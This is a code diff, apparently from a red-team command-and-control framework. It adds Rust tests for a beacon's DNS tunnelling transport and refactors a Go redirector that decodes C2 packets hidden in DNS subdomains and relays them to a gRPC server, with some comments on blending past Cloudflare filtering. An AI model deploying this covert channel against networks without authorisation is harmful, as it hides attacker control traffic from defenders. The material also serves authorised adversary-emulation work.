#[test] + fn test_new_record_type_aaaa() { + let dns = DNS::new( + "dns://8.8.8.8?domain=dnsc2.realm.pub&type=aaaa".to_string(), + None, + ) + .expect("should parse"); + assert_eq!(dns.record_type, DnsRecordType::AAAA); + } + + #[test] + fn test_new_record_type_txt_default() { + let dns = DNS::new("dns://8.8.8.8?domain=dnsc2.realm.pub".to_string(), None) + .expect("should parse"); + assert_eq!(dns.record_type, DnsRecordType::TXT); + } + + #[test] + fn test_new_wildcard_uses_fallbacks() { + let dns = DNS::new("dns://*?domain=dnsc2.realm.pub".to_string(), None).expect("should parse"); + + // Should have fallback servers + assert!(!dns.dns_servers.is_empty()); + // Fallback servers include known DNS resolvers + let has_fallback = dns.dns_servers.iter().any(|s| { + s.contains("1.1.1.1") || s.contains("8.8.8.8") + }); + assert!(has_fallback, "Should have fallback DNS servers"); + } + + #[test] + fn test_new_missing_domain() { + let result = DNS::new("dns://8.8.8.8:53".to_string(), None); + assert!(result.is_err()); + assert!(result.unwrap_err().to_string().contains("domain parameter is required")); + } + + #[test] + fn test_new_without_scheme() { + let dns = DNS::new("8.8.8.8:53?domain=dnsc2.realm.pub".to_string(), None).expect("should parse"); + assert_eq!(dns.base_domain, "dnsc2.realm.pub"); + } + + // ============================================================ + // DNS Packet Building Tests + // ============================================================ + + #[test] + fn test_build_subdomain_simple() { + let dns = DNS { + base_domain: "dnsc2.realm.pub".to_string(), + dns_servers: vec!["8.8.8.8:53".to_string()], + current_server_index: 0, + record_type: DnsRecordType::TXT, + }; + + let packet = DnsPacket { + r#type: PacketType::Init.into(), + sequence: 0, + conversation_id: "test1234".to_string(), + data: vec![0x01, 0x02], + crc32: 0, + window_size: SEND_WINDOW_SIZE as u32, + acks: vec![], + nacks: vec![], + }; + + let subdomain = dns.build_subdomain(&packet).expect("should build"); + + // Should end with base domain + assert!(subdomain.ends_with(".dnsc2.realm.pub")); + + // Should not exceed DNS limits + assert!(subdomain.len() <= MAX_DNS_NAME_LENGTH); + + // Each label should be <= 63 chars + for label in subdomain.split('.') { + assert!(label.len() <= MAX_LABEL_LENGTH, "Label too long: {}", label.len()); + } + } + + #[test] + fn test_build_subdomain_label_splitting() { + let dns = DNS { + base_domain: "x.com".to_string(), + dns_servers: vec!["8.8.8.8:53".to_string()], + current_server_index: 0, + record_type: DnsRecordType::TXT, + }; + + // Create a packet with enough data to require label splitting + let packet = DnsPacket { + r#type: PacketType::Data.into(), + sequence: 1, + conversation_id: "test1234".to_string(), + data: vec![0xAA; 50], // 50 bytes of data + crc32: DNS::calculate_crc32(&vec![0xAA; 50]), + window_size: 10, + acks: vec![], + nacks: vec![], + }; + + let subdomain = dns.build_subdomain(&packet).expect("should build"); + + // Should have multiple labels (dots) + let label_count = subdomain.matches('.').count(); + assert!(label_count > 1, "Expected multiple labels, got {}", label_count); + } + + // ============================================================ + // DNS Query Building Tests + // ============================================================ + + #[test] + fn test_build_dns_query_txt() { + let dns = DNS { + base_domain: "dnsc2.realm.pub".to_string(), + dns_servers: vec![], + current_server_index: 0, + record_type: DnsRecordType::TXT, + }; + + let (query, txid) = dns.build_dns_query("test.dnsc2.realm.pub").expect("should build"); + + // Header should be 12 bytes minimum + assert!(query.len() > 12); + + // Transaction ID should be in first 2 bytes + let query_txid = u16::from_be_bytes([query[0], query[1]]); + assert_eq!(query_txid, txid); + + // Flags should be standard query (0x0100) + assert_eq!(query[2], 0x01); + assert_eq!(query[3], 0x00); + + // Questions count should be 1 + assert_eq!(query[4], 0x00); + assert_eq!(query[5], 0x01); + } + + // ============================================================ + // DNS Response Parsing Tests + // ============================================================ + + #[test] + fn test_parse_dns_response_too_short() { + let dns = DNS { + base_domain: "".to_string(), + dns_servers: vec![], + current_server_index: 0, + record_type: DnsRecordType::TXT, + }; + + let short_response = vec![0u8; 10]; // Less than 12 bytes + let result = dns.parse_dns_response(&short_response, 0x1234); + assert!(result.is_err()); + } + + #[test] + fn test_parse_dns_response_txid_mismatch() { + let dns = DNS { + base_domain: "".to_string(), + dns_servers: vec![], + current_server_index: 0, + record_type: DnsRecordType::TXT, + }; + + // Response with different transaction ID + let mut response = vec![0u8; 20]; + response[0] = 0x12; + response[1] = 0x34; // txid = 0x1234 + + let result = dns.parse_dns_response(&response, 0x5678); // Expect 0x5678 + assert!(result.is_err()); + assert!(result.unwrap_err().to_string().contains("mismatch")); + } + + // ============================================================ + // Chunk Size Calculation Tests + // ============================================================ + + #[test] + fn test_calculate_max_chunk_size_larger_domain_smaller_chunk() { + let dns_short = DNS { + base_domain: "x.co".to_string(), + dns_servers: vec![], + current_server_index: 0, + record_type: DnsRecordType::TXT, + }; + + let dns_long = DNS { + base_domain: "very.long.subdomain.dnsc2.realm.pub".to_string(), + dns_servers: vec![], + current_server_index: 0, + record_type: DnsRecordType::TXT, + }; + + let chunk_short = dns_short.calculate_max_chunk_size(10); + let chunk_long = dns_long.calculate_max_chunk_size(10); + + // Longer domain leaves less room for data (or same if both exceed available space) + assert!(chunk_short >= chunk_long); + } + + // ============================================================ + // Validate and Prepare Chunks Tests + // ============================================================ + + #[test] + fn test_validate_and_prepare_chunks_empty() { + let dns = DNS { + base_domain: "dnsc2.realm.pub".to_string(), + dns_servers: vec![], + current_server_index: 0, + record_type: DnsRecordType::TXT, + }; + + let (chunk_size, total_chunks, crc) = dns.validate_and_prepare_chunks(&[]).unwrap(); + + assert!(chunk_size > 0); + assert_eq!(total_chunks, 1); // Even empty data needs 1 chunk + // CRC is deterministic - just verify it's calculated + assert_eq!(crc, DNS::calculate_crc32(&[])); + } + + #[test] + fn test_validate_and_prepare_chunks_small_data() { + let dns = DNS { + base_domain: "dnsc2.realm.pub".to_string(), + dns_servers: vec![], + current_server_index: 0, + record_type: DnsRecordType::TXT, + }; + + let data = vec![0xAA; 50]; + let (chunk_size, total_chunks, crc) = dns.validate_and_prepare_chunks(&data).unwrap(); + + assert!(chunk_size > 0); + assert!(total_chunks >= 1); + assert_eq!(crc, DNS::calculate_crc32(&data)); + } + + #[test] + fn test_validate_and_prepare_chunks_exceeds_max() { + let dns = DNS { + base_domain: "dnsc2.realm.pub".to_string(), + dns_servers: vec![], + current_server_index: 0, + record_type: DnsRecordType::TXT, + }; + + let huge_data = vec![0xFF; MAX_DATA_SIZE + 1]; + let result = dns.validate_and_prepare_chunks(&huge_data); + + assert!(result.is_err()); + assert!(result.unwrap_err().to_string().contains("exceeds maximum")); + } + + // ============================================================ + // Transport Trait Tests + // ============================================================ + + #[test] + fn test_init_creates_empty_transport() { + let dns = DNS::init(); + assert!(dns.base_domain.is_empty()); + assert!(dns.dns_servers.is_empty()); + assert!(!dns.is_active()); + } + + #[test] + fn test_is_active_with_config() { + let dns = DNS { + base_domain: "dnsc2.realm.pub".to_string(), + dns_servers: vec!["8.8.8.8:53".to_string()], + current_server_index: 0, + record_type: DnsRecordType::TXT, + }; + + assert!(dns.is_active()); + } + + #[test] + fn test_is_active_empty_domain() { + let dns = DNS { + base_domain: "".to_string(), + dns_servers: vec!["8.8.8.8:53".to_string()], + current_server_index: 0, + record_type: DnsRecordType::TXT, + }; + + assert!(!dns.is_active()); + } + + #[test] + fn test_is_active_no_servers() { + let dns = DNS { + base_domain: "dnsc2.realm.pub".to_string(), + dns_servers: vec![], + current_server_index: 0, + record_type: DnsRecordType::TXT, + }; + + assert!(!dns.is_active()); + } + + #[test] + fn test_name_returns_dns() { + let dns = DNS::init(); + assert_eq!(dns.name(), "dns"); + } + + #[test] + fn test_list_available() { + let dns = DNS::init(); + let available = dns.list_available(); + assert_eq!(available, vec!["dns".to_string()]); + } + + #[test] + fn test_get_type() { + let mut dns = DNS::init(); + assert_eq!(dns.get_type(), beacon::Transport::Dns); + } + + // ============================================================ + // DnsRecordType Tests + // ============================================================ + + #[test] + fn test_dns_record_type_equality() { + assert_eq!(DnsRecordType::TXT, DnsRecordType::TXT); + assert_eq!(DnsRecordType::A, DnsRecordType::A); + assert_eq!(DnsRecordType::AAAA, DnsRecordType::AAAA); + assert_ne!(DnsRecordType::TXT, DnsRecordType::A); + } + + // ============================================================ + // Chunk Response Processing Tests + // ============================================================ + + #[test] + fn test_process_chunk_response_invalid_protobuf() { + let invalid_data = vec![0xFF, 0xFF, 0xFF]; + let result = DNS::process_chunk_response(&invalid_data, 1, 10); + + // Should not error, just mark for retry + assert!(result.is_ok()); + let (_acks, nacks) = result.unwrap(); + assert!(nacks.contains(&1)); + } + + #[test] + fn test_process_chunk_response_valid_status() { + // Create a valid STATUS packet with ACKs + let status_packet = DnsPacket { + r#type: PacketType::Status.into(), + sequence: 0, + conversation_id: "test".to_string(), + data: vec![], + crc32: 0, + window_size: 10, + acks: vec![AckRange { + start_seq: 1, + end_seq: 3, + }], + nacks: vec![5, 6], + }; + + let mut buf = Vec::new(); + status_packet.encode(&mut buf).unwrap(); + + let result = DNS::process_chunk_response(&buf, 1, 10); + assert!(result.is_ok()); + + let (acks, nacks) = result.unwrap(); + assert!(acks.contains(&1)); + assert!(acks.contains(&2)); + assert!(acks.contains(&3)); + assert!(nacks.contains(&5)); + assert!(nacks.contains(&6)); + } +} diff --git a/tavern/internal/c2/dnspb/dns.pb.go b/tavern/internal/c2/dnspb/dns.pb.go index 9f319ef7a..83c2ff9b3 100644 --- a/tavern/internal/c2/dnspb/dns.pb.go +++ b/tavern/internal/c2/dnspb/dns.pb.go @@ -82,8 +82,8 @@ func (PacketType) EnumDescriptor() ([]byte, []int) { type DNSPacket struct { state protoimpl.MessageState `protogen:"open.v1"` Type PacketType `protobuf:"varint,1,opt,name=type,proto3,enum=dns.PacketType" json:"type,omitempty"` // Packet type - Sequence uint32 `protobuf:"varint,2,opt,name=sequence,proto3" json:"sequence,omitempty"` // Chunk sequence number (0-based) - ConversationId string `protobuf:"bytes,3,opt,name=conversation_id,json=conversationId,proto3" json:"conversation_id,omitempty"` // 12-character random conversation ID + Sequence uint32 `protobuf:"varint,2,opt,name=sequence,proto3" json:"sequence,omitempty"` // Chunk sequence number (0-Based for INIT, 1-based for DATA) + ConversationId string `protobuf:"bytes,3,opt,name=conversation_id,json=conversationId,proto3" json:"conversation_id,omitempty"` // 8-character random conversation ID Data []byte `protobuf:"bytes,4,opt,name=data,proto3" json:"data,omitempty"` // Chunk payload (or InitPayload for INIT packets) Crc32 uint32 `protobuf:"varint,5,opt,name=crc32,proto3" json:"crc32,omitempty"` // Optional CRC32 for validation // Async protocol fields for windowed transmission @@ -307,7 +307,7 @@ func (x *InitPayload) GetFileSize() uint32 { // It specifies which response chunk to retrieve type FetchPayload struct { state protoimpl.MessageState `protogen:"open.v1"` - ChunkIndex uint32 `protobuf:"varint,1,opt,name=chunk_index,json=chunkIndex,proto3" json:"chunk_index,omitempty"` // Which chunk to fetch (0-based) + ChunkIndex uint32 `protobuf:"varint,1,opt,name=chunk_index,json=chunkIndex,proto3" json:"chunk_index,omitempty"` // Which chunk to fetch (1-based) unknownFields protoimpl.UnknownFields sizeCache protoimpl.SizeCache } diff --git a/tavern/internal/c2/proto/dns.proto b/tavern/internal/c2/proto/dns.proto index 6fc76d8aa..308b87254 100644 --- a/tavern/internal/c2/proto/dns.proto +++ b/tavern/internal/c2/proto/dns.proto @@ -17,8 +17,8 @@ enum PacketType { // It is serialized to protobuf, then encoded (Base64/Base58/Base32), and sent as DNS subdomain message DNSPacket { PacketType type = 1; // Packet type - uint32 sequence = 2; // Chunk sequence number (0-based) - string conversation_id = 3; // 12-character random conversation ID + uint32 sequence = 2; // Chunk sequence number (0-Based for INIT, 1-based for DATA) + string conversation_id = 3; // 8-character random conversation ID bytes data = 4; // Chunk payload (or InitPayload for INIT packets) uint32 crc32 = 5; // Optional CRC32 for validation @@ -46,7 +46,7 @@ message InitPayload { // FetchPayload is the payload for FETCH packets // It specifies which response chunk to retrieve message FetchPayload { - uint32 chunk_index = 1; // Which chunk to fetch (0-based) + uint32 chunk_index = 1; // Which chunk to fetch (1-based) } // ResponseMetadata indicates the response is chunked and must be fetched diff --git a/tavern/internal/redirectors/dns/dns.go b/tavern/internal/redirectors/dns/dns.go index a167d1323..55269f055 100644 --- a/tavern/internal/redirectors/dns/dns.go +++ b/tavern/internal/redirectors/dns/dns.go @@ -44,6 +44,11 @@ const ( txtMaxChunkSize = 255 + // Benign DNS response configuration + // IP address returned for non-C2 A record queries to avoid NXDOMAIN responses + // which can interfere with recursive DNS lookups (e.g., Cloudflare) + benignARecordIP = "0.0.0.0" + // Async protocol configuration MaxActiveConversations = 10000 NormalConversationTimeout = 15 * time.Minute @@ -62,7 +67,7 @@ func init() { type Redirector struct { conversations sync.Map baseDomains []string - conversationCount int32 // Atomic counter for active conversations + conversationCount int32 conversationTimeout time.Duration } @@ -127,7 +132,10 @@ func (r *Redirector) Redirect(ctx context.Context, listenOn string, upstream *gr continue } - go r.handleDNSQuery(ctx, conn, addr, buf[:n], upstream) + // Process query synchronously + queryCopy := make([]byte, n) + copy(queryCopy, buf[:n]) + r.handleDNSQuery(ctx, conn, addr, queryCopy, upstream) } } } @@ -218,12 +226,7 @@ func (r *Redirector) handleDNSQuery(ctx context.Context, conn *net.UDPConn, addr domain = strings.ToLower(domain) - // Log ALL queries to track Cloudflare filtering patterns - if queryType == txtRecordType { - slog.Info("TXT query received", "domain", domain, "from", addr.String()) - } else { - slog.Debug("received DNS query", "domain", domain, "query_type", queryType, "from", addr.String()) - } + slog.Debug("received DNS query", "domain", domain, "query_type", queryType, "from", addr.String()) // Extract subdomain subdomain, err := r.extractSubdomain(domain) @@ -236,16 +239,14 @@ func (r *Redirector) handleDNSQuery(ctx context.Context, conn *net.UDPConn, addr // Decode packet packet, err := r.decodePacket(subdomain) if err != nil { - // Silently drop queries that fail to decode - likely legitimate DNS queries or probes - // Cloudflare forwards all queries under our zone, not just C2 traffic slog.Debug("ignoring non-C2 query", "domain", domain, "error", err) - // For A record queries, return benign IP (127.0.0.1) instead of NXDOMAIN + // For A record queries, return benign IP instead of NXDOMAIN // Cloudflare does recursive lookups on subdomain components - if we return NXDOMAIN - // for the parent subdomain, it won't forward the full TXT query for INIT packets + // for the parent subdomain, it won't forward the full TXT query if queryType == aRecordType { slog.Debug("returning benign A record for non-C2 subdomain", "domain", domain) - r.sendDNSResponse(conn, addr, transactionID, domain, queryType, []byte{127, 0, 0, 1}) + r.sendDNSResponse(conn, addr, transactionID, domain, queryType, net.ParseIP(benignARecordIP).To4()) return } @@ -256,12 +257,10 @@ func (r *Redirector) handleDNSQuery(ctx context.Context, conn *net.UDPConn, addr // Validate packet type before processing if packet.Type == dnspb.PacketType_PACKET_TYPE_UNSPECIFIED { - // Invalid/empty packet - likely parsing artifact from random domain slog.Debug("ignoring packet with unspecified type", "domain", domain) - // Return benign A record for A queries to satisfy Cloudflare recursive lookups if queryType == aRecordType { - r.sendDNSResponse(conn, addr, transactionID, domain, queryType, []byte{127, 0, 0, 1}) + r.sendDNSResponse(conn, addr, transactionID, domain, queryType, net.ParseIP(benignARecordIP).To4()) return } @@ -285,7 +284,6 @@ func (r *Redirector) handleDNSQuery(ctx context.Context, conn *net.UDPConn, addr } if err != nil { - // Log as WARN since conversation-not-found is expected with UDP packet loss slog.Warn("packet handling failed", "type", packet.Type, "conv_id", packet.ConversationId, "error", err) r.sendErrorResponse(conn, addr, transactionID) return @@ -322,21 +320,14 @@ func (r *Redirector) extractSubdomain(domain string) (string, error) { return "", fmt.Errorf("no matching base domain") } -// decodePacket decodes DNS packet from subdomain -// Subdomain format: . -// The entire protobuf packet is base32-encoded and split into 63-char labels func (r *Redirector) decodePacket(subdomain string) (*dnspb.DNSPacket, error) { - // Remove all dots to get continuous base32 string - // Labels were split at 63-char boundaries, now rejoin them encodedData := strings.ReplaceAll(subdomain, ".", "") - // Decode data using Base32 (case-insensitive, no padding) packetData, err := base32.StdEncoding.WithPadding(base32.NoPadding).DecodeString(strings.ToUpper(encodedData)) if err != nil { return nil, fmt.Errorf("failed to decode Base32 data: %w", err) } - // Unmarshal protobuf var packet dnspb.DNSPacket if err := proto.Unmarshal(packetData, &packet); err != nil { return nil, fmt.Errorf("failed to unmarshal protobuf: %w", err) @@ -355,25 +346,18 @@ func (r *Redirector) decodePacket(subdomain string) (*dnspb.DNSPacket, error) { // handleInitPacket processes INIT packet func (r *Redirector) handleInitPacket(packet *dnspb.DNSPacket) ([]byte, error) { - // Atomically check and increment conversation count - // Loop until we successfully increment or hit the limit for { current := atomic.LoadInt32(&r.conversationCount) if current >= MaxActiveConversations { return nil, fmt.Errorf("max active conversations reached: %d", current) } - // Try to increment atomically if atomic.CompareAndSwapInt32(&r.conversationCount, current, current+1) { - // Successfully incremented, break out break } - // CAS failed (another goroutine modified the value), retry } - // Unmarshal init payload var initPayload dnspb.InitPayload if err := proto.Unmarshal(packet.Data, &initPayload); err != nil { - // Decrement on error since we already incremented atomic.AddInt32(&r.conversationCount, -1) return nil, fmt.Errorf("failed to unmarshal init payload: %w", err) } @@ -384,7 +368,6 @@ func (r *Redirector) handleInitPacket(packet *dnspb.DNSPacket) ([]byte, error) { return nil, fmt.Errorf("data size exceeds maximum: %d > %d bytes", initPayload.FileSize, MaxDataSize) } - // Validate that FileSize is set (protobuf default is 0) if initPayload.FileSize == 0 && initPayload.TotalChunks > 0 { slog.Warn("INIT packet missing file_size field", "conv_id", packet.ConversationId, "total_chunks", initPayload.TotalChunks) } @@ -392,7 +375,6 @@ func (r *Redirector) handleInitPacket(packet *dnspb.DNSPacket) ([]byte, error) { slog.Debug("creating conversation", "conv_id", packet.ConversationId, "method", initPayload.MethodCode, "total_chunks", initPayload.TotalChunks, "file_size", initPayload.FileSize, "crc32", initPayload.DataCrc32) - // Create conversation conv := &Conversation{ ID: packet.ConversationId, MethodPath: initPayload.MethodCode, @@ -406,11 +388,9 @@ func (r *Redirector) handleInitPacket(packet *dnspb.DNSPacket) ([]byte, error) { r.conversations.Store(packet.ConversationId, conv) - slog.Info("C2 conversation started", "conv_id", conv.ID, "method", conv.MethodPath, + slog.Debug("C2 conversation started", "conv_id", conv.ID, "method", conv.MethodPath, "total_chunks", conv.TotalChunks, "data_size", initPayload.FileSize) - // Return empty STATUS packet (no ACKs/NACKs yet) to look like legitimate DNS data - // Don't return plain text "ok" which could trigger Cloudflare filters statusPacket := &dnspb.DNSPacket{ Type: dnspb.PacketType_PACKET_TYPE_STATUS, ConversationId: packet.ConversationId, @@ -430,7 +410,6 @@ func (r *Redirector) handleInitPacket(packet *dnspb.DNSPacket) ([]byte, error) { func (r *Redirector) handleDataPacket(ctx context.Context, upstream *grpc.ClientConn, packet *dnspb.DNSPacket, queryType uint16) ([]byte, error) { val, ok := r.conversations.Load(packet.ConversationId) if !ok { - // Log at debug - this is normal with UDP packet loss/reordering (INIT may arrive later) slog.Debug("DATA packet for unknown conversation (INIT may be lost/delayed)", "conv_id", packet.ConversationId, "seq", packet.Sequence) return nil, fmt.Errorf("conversation not found: %s", packet.ConversationId) @@ -440,24 +419,20 @@ func (r *Redirector) handleDataPacket(ctx context.Context, upstream *grpc.Client conv.mu.Lock() defer conv.mu.Unlock() - // Validate sequence number if packet.Sequence < 1 || packet.Sequence > conv.TotalChunks { return nil, fmt.Errorf("sequence out of bounds: %d (expected 1-%d)", packet.Sequence, conv.TotalChunks) } - // Store chunk (sequence is 1-indexed, overwrites duplicates safely) conv.Chunks[packet.Sequence] = packet.Data conv.LastActivity = time.Now() slog.Debug("received chunk", "conv_id", conv.ID, "seq", packet.Sequence, "size", len(packet.Data), "total", len(conv.Chunks)) - // Check if conversation is complete and auto-process if uint32(len(conv.Chunks)) == conv.TotalChunks && !conv.Completed { conv.Completed = true - slog.Info("C2 request complete, forwarding to upstream", "conv_id", conv.ID, + slog.Debug("C2 request complete, forwarding to upstream", "conv_id", conv.ID, "method", conv.MethodPath, "total_chunks", conv.TotalChunks, "data_size", conv.ExpectedDataSize) - // Unlock before calling processCompletedConversation (it will re-lock) conv.mu.Unlock() if err := r.processCompletedConversation(ctx, upstream, conv, queryType); err != nil { slog.Error("failed to process completed conversation", "conv_id", conv.ID, "error", err) @@ -465,7 +440,6 @@ func (r *Redirector) handleDataPacket(ctx context.Context, upstream *grpc.Client conv.mu.Lock() } - // Build ACK/NACK response (STATUS packet) acks, nacks := r.computeAcksNacks(conv) statusPacket := &dnspb.DNSPacket{ @@ -475,7 +449,6 @@ func (r *Redirector) handleDataPacket(ctx context.Context, upstream *grpc.Client Nacks: nacks, } - // Marshal STATUS packet to return as response statusData, err := proto.Marshal(statusPacket) if err != nil { return nil, fmt.Errorf("failed to marshal status packet: %w", err) @@ -489,7 +462,7 @@ func (r *Redirector) processCompletedConversation(ctx context.Context, upstream conv.mu.Lock() defer conv.mu.Unlock() - // Reassemble data (chunks are 1-indexed) + // Reassemble data var fullData []byte for i := uint32(1); i <= conv.TotalChunks; i++ { chunk, ok := conv.Chunks[i] @@ -499,10 +472,8 @@ func (r *Redirector) processCompletedConversation(ctx context.Context, upstream fullData = append(fullData, chunk...) } - // Verify CRC actualCRC := crc32.ChecksumIEEE(fullData) if actualCRC != conv.ExpectedCRC { - // Clean up on fatal error r.conversations.Delete(conv.ID) atomic.AddInt32(&r.conversationCount, -1) return fmt.Errorf("data CRC mismatch: expected %d, got %d", conv.ExpectedCRC, actualCRC) @@ -510,24 +481,19 @@ func (r *Redirector) processCompletedConversation(ctx context.Context, upstream slog.Debug("reassembled data", "conv_id", conv.ID, "size", len(fullData), "method", conv.MethodPath) - // Validate reassembled size matches client-provided data size (if provided) if conv.ExpectedDataSize > 0 && uint32(len(fullData)) != conv.ExpectedDataSize { - // Clean up on fatal error r.conversations.Delete(conv.ID) atomic.AddInt32(&r.conversationCount, -1) return fmt.Errorf("reassembled data size mismatch: expected %d bytes, got %d bytes", conv.ExpectedDataSize, len(fullData)) } - // Forward to upstream gRPC server responseData, err := r.forwardToUpstream(ctx, upstream, conv.MethodPath, fullData) if err != nil { - // Clean up on fatal error r.conversations.Delete(conv.ID) atomic.AddInt32(&r.conversationCount, -1) return fmt.Errorf("failed to forward to upstream: %w", err) } - // Determine max response size based on record type var maxSize int switch queryType { case txtRecordType: @@ -540,13 +506,10 @@ func (r *Redirector) processCompletedConversation(ctx context.Context, upstream maxSize = 400 } - // Check if response needs chunking if len(responseData) > maxSize { - // Calculate CRC for full response conv.ResponseCRC = crc32.ChecksumIEEE(responseData) conv.ResponseData = responseData - // Split into chunks conv.ResponseChunks = nil for i := 0; i < len(responseData); i += maxSize { end := i + maxSize @@ -561,7 +524,6 @@ func (r *Redirector) processCompletedConversation(ctx context.Context, upstream slog.Debug("response chunked", "conv_id", conv.ID, "total_size", len(responseData), "chunks", len(conv.ResponseChunks), "crc32", conv.ResponseCRC) } else { - // Response fits in single packet conv.ResponseData = responseData conv.LastActivity = time.Now() @@ -574,14 +536,13 @@ func (r *Redirector) processCompletedConversation(ctx context.Context, upstream // computeAcksNacks computes ACK ranges and NACK list for a conversation // Must be called with conv.mu locked func (r *Redirector) computeAcksNacks(conv *Conversation) ([]*dnspb.AckRange, []uint32) { - // Build sorted list of received sequences received := make([]uint32, 0, len(conv.Chunks)) for seq := range conv.Chunks { received = append(received, seq) } sort.Slice(received, func(i, j int) bool { return received[i] < received[j] }) - // Compute ACK ranges (contiguous blocks) + // Compute ACK ranges acks := []*dnspb.AckRange{} if len(received) > 0 { start := received[0] @@ -599,16 +560,13 @@ func (r *Redirector) computeAcksNacks(conv *Conversation) ([]*dnspb.AckRange, [] acks = append(acks, &dnspb.AckRange{StartSeq: start, EndSeq: end}) } - // Limit ACK ranges if len(acks) > MaxAckRangesInResponse { acks = acks[:MaxAckRangesInResponse] } - // Compute NACKs (missing sequences in gaps) nacks := []uint32{} if len(received) > 0 { - // Find gaps between first and last received minReceived := received[0] maxReceived := received[len(received)-1] @@ -647,12 +605,8 @@ func (r *Redirector) handleFetchPacket(packet *dnspb.DNSPacket) ([]byte, error) conv.LastActivity = time.Now() - // Check if response was chunked if len(conv.ResponseChunks) > 0 { - // Empty data = metadata request - // Non-empty data = FetchPayload with 1-based chunk_index if len(packet.Data) == 0 { - // Return ResponseMetadata metadata := &dnspb.ResponseMetadata{ TotalChunks: uint32(len(conv.ResponseChunks)), DataCrc32: conv.ResponseCRC, @@ -669,13 +623,11 @@ func (r *Redirector) handleFetchPacket(packet *dnspb.DNSPacket) ([]byte, error) return metadataBytes, nil } - // Parse FetchPayload - chunk_index is 1-based var fetchPayload dnspb.FetchPayload if err := proto.Unmarshal(packet.Data, &fetchPayload); err != nil { return nil, fmt.Errorf("failed to unmarshal fetch payload: %w", err) } - // Convert 1-based to 0-based array index chunkIndex := int(fetchPayload.ChunkIndex) - 1 if chunkIndex < 0 || chunkIndex >= len(conv.ResponseChunks) { @@ -688,9 +640,6 @@ func (r *Redirector) handleFetchPacket(packet *dnspb.DNSPacket) ([]byte, error) return conv.ResponseChunks[chunkIndex], nil } - // Single response (not chunked) - // Don't delete immediately - rely on timeout-based cleanup - slog.Debug("returning response", "conv_id", conv.ID, "size", len(conv.ResponseData)) return conv.ResponseData, nil @@ -698,11 +647,9 @@ func (r *Redirector) handleFetchPacket(packet *dnspb.DNSPacket) ([]byte, error) // forwardToUpstream sends request to gRPC server and returns response func (r *Redirector) forwardToUpstream(ctx context.Context, upstream *grpc.ClientConn, methodPath string, requestData []byte) ([]byte, error) { - // Create gRPC stream with the raw codec md := metadata.New(map[string]string{}) ctx = metadata.NewOutgoingContext(ctx, md) - // Determine if this is a streaming method isClientStreaming := methodPath == "/c2.C2/ReportFile" isServerStreaming := methodPath == "/c2.C2/FetchAsset" @@ -715,9 +662,7 @@ func (r *Redirector) forwardToUpstream(ctx context.Context, upstream *grpc.Clien return nil, fmt.Errorf("failed to create stream: %w", err) } - // Send request if isClientStreaming { - // For client streaming (ReportFile), parse length-prefixed chunks and send individually offset := 0 chunkCount := 0 for offset < len(requestData) { @@ -725,7 +670,6 @@ func (r *Redirector) forwardToUpstream(ctx context.Context, upstream *grpc.Clien break } - // Read 4-byte length prefix msgLen := binary.BigEndian.Uint32(requestData[offset : offset+4]) offset += 4 @@ -733,7 +677,6 @@ func (r *Redirector) forwardToUpstream(ctx context.Context, upstream *grpc.Clien return nil, fmt.Errorf("invalid chunk length: %d bytes at offset %d", msgLen, offset) } - // Send individual chunk (already encrypted) chunk := requestData[offset : offset+int(msgLen)] if err := stream.SendMsg(chunk); err != nil { return nil, fmt.Errorf("failed to send chunk %d: %w", chunkCount, err) @@ -745,7 +688,6 @@ func (r *Redirector) forwardToUpstream(ctx context.Context, upstream *grpc.Clien slog.Debug("sent client streaming chunks", "method", methodPath, "chunks", chunkCount) } else { - // For unary/server-streaming, send the request as-is if err := stream.SendMsg(requestData); err != nil { return nil, fmt.Errorf("failed to send request: %w", err) } @@ -755,16 +697,13 @@ func (r *Redirector) forwardToUpstream(ctx context.Context, upstream *grpc.Clien return nil, fmt.Errorf("failed to close send: %w", err) } - // Receive response(s) var responseData []byte if isServerStreaming { - // For server streaming (FetchAsset), receive multiple chunks with length prefixes responseCount := 0 for { var msg []byte err := stream.RecvMsg(&msg) if err != nil { - // Check for EOF (normal end of stream) if errors.Is(err, io.EOF) { break } @@ -772,7 +711,6 @@ func (r *Redirector) forwardToUpstream(ctx context.Context, upstream *grpc.Clien } if len(msg) > 0 { - // Add 4-byte length prefix before each response chunk lengthPrefix := make([]byte, 4) binary.BigEndian.PutUint32(lengthPrefix, uint32(len(msg))) responseData = append(responseData, lengthPrefix...) @@ -782,7 +720,6 @@ func (r *Redirector) forwardToUpstream(ctx context.Context, upstream *grpc.Clien } slog.Debug("received server streaming responses", "method", methodPath, "count", responseCount) } else { - // For unary, receive single response if err := stream.RecvMsg(&responseData); err != nil { return nil, fmt.Errorf("failed to receive response: %w", err) } @@ -812,7 +749,6 @@ func (r *Redirector) parseDomainNameAndType(data []byte) (string, uint16, error) offset += length } - // Skip the null terminator (0x00) offset++ if offset+2 > len(data) { @@ -828,20 +764,17 @@ func (r *Redirector) parseDomainNameAndType(data []byte) (string, uint16, error) // sendDNSResponse sends a DNS response with appropriate record type (TXT/A/AAAA) // For A/AAAA records with data larger than 4/16 bytes, multiple answer records are sent func (r *Redirector) sendDNSResponse(conn *net.UDPConn, addr *net.UDPAddr, transactionID uint16, domain string, queryType uint16, data []byte) { - // For A/AAAA records, base32-encode data first (client expects to decode it) if queryType == aRecordType || queryType == aaaaRecordType { encoded := base32.StdEncoding.WithPadding(base32.NoPadding).EncodeToString(data) data = []byte(encoded) } - // Determine chunk size and number of answer records needed var recordSize int var answerCount uint16 switch queryType { case txtRecordType: - // TXT can handle all data in one record (with internal chunking) - recordSize = 0 // Special case - handled separately + recordSize = 0 answerCount = 1 case aRecordType: recordSize = 4 @@ -856,7 +789,6 @@ func (r *Redirector) sendDNSResponse(conn *net.UDPConn, addr *net.UDPAddr, trans answerCount = 1 } default: - // Unknown type - single empty record recordSize = 0 answerCount = 1 } @@ -871,7 +803,6 @@ func (r *Redirector) sendDNSResponse(conn *net.UDPConn, addr *net.UDPAddr, trans response = append(response, 0x00, 0x00) // Authority RRs: 0 response = append(response, 0x00, 0x00) // Additional RRs: 0 - // Question section - echo back the original query type for _, label := range strings.Split(domain, ".") { if len(label) == 0 { continue @@ -883,10 +814,8 @@ func (r *Redirector) sendDNSResponse(conn *net.UDPConn, addr *net.UDPAddr, trans response = append(response, byte(queryType>>8), byte(queryType&0xFF)) // Type: original query type response = append(response, 0x00, byte(dnsClassIN)) // Class: IN - // Answer section - build multiple records for A/AAAA switch queryType { case txtRecordType: - // TXT record: single record with length-prefixed strings (split into 255-byte chunks) response = append(response, byte(dnsPointer>>8), byte(dnsPointer&0xFF)) // Name pointer response = append(response, byte(queryType>>8), byte(queryType&0xFF)) // Type: TXT response = append(response, 